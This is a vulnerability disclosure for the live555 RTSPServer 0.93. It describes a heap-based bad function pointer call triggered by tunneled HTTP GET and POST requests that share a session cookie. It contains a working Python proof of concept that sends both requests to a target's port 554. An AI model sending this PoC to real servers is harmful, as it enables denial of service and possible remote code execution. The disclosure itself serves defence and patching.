Description
ISSUE DESCRIPTION
The project website : http://www.live555.com/liveMedia/
I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported.
I only need to send two HTTP requests in one TCP connection.
The problem occurrs in RTSPServer.cpp:853 , it calls handleHTTPCmd_TunnelingPOST.
If I send a HTTP GET packet with a specific sessionCookie firstly, then I send a HTTP POST packet with this sessionCookie in the same TCP connection.
RTSPServer will call a error virtual function pointer in readSocket function(GroupsockHepler.cpp) and the pointer value comes from heap which may control.
Attack PoC python code:
from socket import *
target_ip = REMOTE_SERVER_IP
target_port = 554 # or 8554
tcp = socket(AF_INET,SOCK_STREAM)
tcp.connect((target_ip,target_port))
http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''
http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''
tcp.send(http_request_GET)
data = tcp.recv(1024)
tcp.send(http_request_POST)
tcp.close()
You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.
Original vulnerability discoverer:
许彬彬 Xubinbin
IMPACT
It will cause dos attack and potential remote command execution in version 0.93(I verified) , even all earlier versions (This is just my unverified guess).